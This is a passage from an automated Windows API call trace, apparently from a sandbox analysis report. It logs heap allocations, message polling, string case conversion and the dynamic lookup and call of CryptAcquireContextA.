wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.179] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0267.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.179] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0267.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0267.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0267.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.179] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0267.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0267.180] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0267.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0267.180] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0267.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0267.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0267.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0267.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0267.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0267.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0267.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0267.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0267.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0267.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0267.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0267.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0267.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0267.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0267.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0267.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0267.188] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0267.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0267.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0267.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0267.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0267.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0267.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0267.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0267.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0267.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0267.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0267.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0267.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0267.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0267.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.192] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0267.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0267.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0267.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3570 [0267.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0267.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0267.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15) returned 0x2466db0 [0267.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0267.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.193] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0267.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0267.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3570 | out: hHeap=0x25c0000) returned 1 [0267.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.195] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0267.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.197] HeapFree (in: 